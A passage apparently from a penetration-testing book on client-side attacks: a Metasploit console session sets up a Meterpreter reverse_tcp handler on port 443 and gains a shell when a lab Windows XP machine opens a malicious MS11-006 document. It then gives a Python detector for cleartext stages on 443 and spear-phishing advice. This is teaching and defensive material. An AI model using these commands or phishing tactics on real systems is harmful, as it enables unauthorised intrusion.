Exploitation Using Client-Side Attacks
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.128:443
[*] Starting the payload handler...
msf exploit(handler) >
We open the document on a Windows XP virtual machine, and we
should be presented with a shell (provided our VM is Windows XP SP3):
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.131:2718) at Sun Apr 03 21:39:58 -0400 2011
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We have successfully exploited a file format vulnerability by creating a
malicious document through Metasploit and then sending it to our targeted
user. Looking back at this exploit, if we had performed proper reconnaissance
on our target user, we could have crafted a pretty convincing email. This exploit
is one example of a number of file format exploits available in Metasploit.
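From the defender's side, the session above has a tell worth knowing: the handler listens on 443, but the payload is plain reverse_tcp, so the 749,056-byte stage crosses the wire without a TLS handshake. The following is an added example, not code from the book or from the Metasploit project, that triages captured flows by the first bytes the server sent on port 443. It assumes (and labels as assumptions in the comments) that the Windows reverse_tcp stager receives a 4-byte little-endian length followed by the stage image and that a Meterpreter stage begins with an "MZ" header; the sample flows are constructed.

```python
"""Added example: flag a cleartext reverse_tcp stage arriving on port 443.

Assumptions (not stated in the book): the Windows reverse_tcp stager reads a
4-byte little-endian length and then the stage image, and the Meterpreter
stage starts with an "MZ" header. All flows below are constructed samples.
"""
import struct

TLS_HANDSHAKE = 0x16
TLS_VERSIONS = {0x0300, 0x0301, 0x0302, 0x0303, 0x0304}


def is_tls_record(data: bytes) -> bool:
    """True if the first bytes look like a TLS handshake record (ServerHello).

    A TLS record header is: content type (1 byte), version (2 bytes),
    length (2 bytes). A server that speaks TLS on 443 starts with 0x16 0x03 0x0x.
    """
    if len(data) < 5:
        return False
    content_type = data[0]
    version = struct.unpack(">H", data[1:3])[0]
    return content_type == TLS_HANDSHAKE and version in TLS_VERSIONS


def is_length_prefixed_pe(data: bytes) -> bool:
    """True if the first bytes look like <u32 LE length><PE image>.

    Assumption: this is the framing a reverse_tcp stager expects. The size
    window is a sanity bound (the stage in the session above is 749,056 bytes).
    """
    if len(data) < 6:
        return False
    stage_len = struct.unpack("<I", data[:4])[0]
    return 16 * 1024 <= stage_len <= 16 * 1024 * 1024 and data[4:6] == b"MZ"


def classify_flow(flow: dict) -> str:
    """Classify one outbound TCP flow by the first bytes the server sent back."""
    if flow["dst_port"] != 443:
        return "ignored: not a TLS port"
    first = flow["server_first_bytes"]
    if is_tls_record(first):
        return "ok: TLS handshake"
    if is_length_prefixed_pe(first):
        return "alert: length-prefixed PE image on 443 (reverse_tcp stage?)"
    return "alert: non-TLS data on 443"


# Constructed sample flows: a real TLS ServerHello, a staged payload framed
# the way the stager expects, and ordinary HTTP on port 80 (out of scope).
SAMPLE_FLOWS = [
    {"src": "172.16.32.131", "dst": "172.16.32.128", "dst_port": 443,
     "server_first_bytes": bytes.fromhex("160301005a020000560303")},
    {"src": "172.16.32.131", "dst": "172.16.32.128", "dst_port": 443,
     "server_first_bytes": struct.pack("<I", 749056) + b"MZ\x90\x00\x03\x00"},
    {"src": "172.16.32.131", "dst": "192.0.2.10", "dst_port": 80,
     "server_first_bytes": b"HTTP/1.1 200 OK\r\n"},
]


def triage(flows):
    """Return (src, dst, port, verdict) for every flow."""
    return [(f["src"], f["dst"], f["dst_port"], classify_flow(f)) for f in flows]


if __name__ == "__main__":
    for row in triage(SAMPLE_FLOWS):
        print(row)
```

The check only needs the first few server bytes of each flow, so it runs cheaply over a sensor's flow records; the second sample trips both heuristics, while a genuine HTTPS session passes because its first record is a TLS handshake. Staged payloads that are TLS-wrapped (reverse_https) are not caught by this check, which is exactly why the distinction between reverse_tcp on 443 and real TLS matters.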
Wrapping Up
We covered how client-side exploits generally work by manipulating the heap
to work in the attacker’s favor. We covered how NOP instructions work within
an attack and how to use the basics of a debugger. You’ll learn more about
leveraging a debugger in Chapters 14 and 15. MS11-006 was a stack-based
overflow, which we will cover in depth in later chapters. Note that your success
rate with these types of attacks depends on how much information you
gain about the target before you attempt to perform the attacks.
As a penetration tester, every bit of information can be used to craft an
even better attack. In the case of spear-phishing, if you can talk the language
of the company and target your attacks against smaller business units within
the company that probably aren’t technical in nature, your chances of success
greatly increase. Browser exploits and file format exploits are typically very
effective, provided you do your homework. We'll cover this topic in more
detail in Chapters 8 and 10.